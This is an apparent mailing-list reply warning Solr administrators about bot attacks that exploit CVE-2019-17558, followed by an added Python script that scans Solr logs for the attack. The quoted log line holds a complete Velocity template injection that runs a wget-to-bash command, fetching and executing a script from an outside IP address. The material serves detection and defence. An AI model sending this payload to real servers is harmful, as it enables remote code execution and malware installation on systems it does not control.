Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being attacked by a bot using this security hole:

https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there were strange queries very similar to what you have here:

webapp=/solr path=/select 
params={*q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity*}
 status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) [c:sitecore_submittals_index 
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] 
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = 
queryResponseWriter,name = velocity,class = 
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, 
class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}

We configured the firewall to block the Solr port. After that, my client's Solr node has been running for 4 weeks so far. I think this security hole doesn't just leak the information but it can also kill the Solr process.

TK
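As an added defender-side example (not part of TK's message and not Solr's own code), the Python below scans Solr request log lines of the shape quoted above and flags the two indicators that log shows: a /select request with wt=velocity plus an inline v.template.custom template, and the PluginBag line that lazily loads VelocityResponseWriter with params.resource.loader.enabled=true. The sample log lines are constructed (the command payload is replaced by a placeholder), and the regex assumes the standard Solr "path=... params={...} status=N" request-log format.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original post). Line 1 mimics the
# shape of the query TK quoted with the command payload replaced by PLACEHOLDER,
# line 2 is the lazy writer-load event, line 3 is a benign JSON query.
SAMPLE_LOG = """\
2020-12-20 08:49:06.900 INFO  (qtp1-1) [c:idx s:shard1 r:core_node1 x:idx_shard1_replica1] o.a.s.c.S.Request [idx_shard1_replica1]  webapp=/solr path=/select params={q=1&v.template=custom&v.template.custom=%23set(%24x%3D'')+PLACEHOLDER&wt=velocity} status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp1-1) [c:idx s:shard1 r:core_node1 x:idx_shard1_replica1] o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = queryResponseWriter,name = velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = {startup=lazy}}
2020-12-20 08:50:01.100 INFO  (qtp1-2) [c:idx s:shard1 r:core_node1 x:idx_shard1_replica1] o.a.s.c.S.Request [idx_shard1_replica1]  webapp=/solr path=/select params={q=title:solr&wt=json&rows=10} status=0 QTime=3
"""

PARAMS_RE = re.compile(r"path=(?P<path>\S+) params=\{(?P<params>.*)\} status=(?P<status>\d+)")
LOADER_RE = re.compile(r"VelocityResponseWriter.*params\.resource\.loader\.enabled=true")

def parse_params(raw):
    """Split Solr's params={...} blob into a dict of decoded key -> list of values."""
    out = {}
    for pair in raw.split("&"):
        key, _, value = pair.partition("=")
        out.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return out

def scan_solr_log(text):
    """Return (line_no, reason) for every line showing an inline Velocity template
    request (CVE-2019-17558 pattern) or the writer being loaded with the params
    resource loader enabled. Status codes are reported but not used to filter:
    TK's quoted request returned 400 yet still triggered the writer load."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if LOADER_RE.search(line):
            findings.append((n, "VelocityResponseWriter loaded with params.resource.loader.enabled=true"))
            continue
        m = PARAMS_RE.search(line)
        if not m:
            continue
        params = parse_params(m.group("params"))
        if "velocity" in params.get("wt", []) and "v.template.custom" in params:
            tpl = params["v.template.custom"][0]
            findings.append((n, f"inline Velocity template via wt=velocity (status={m.group('status')}): {tpl[:40]!r}"))
    return findings

if __name__ == "__main__":
    for n, reason in scan_solr_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```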
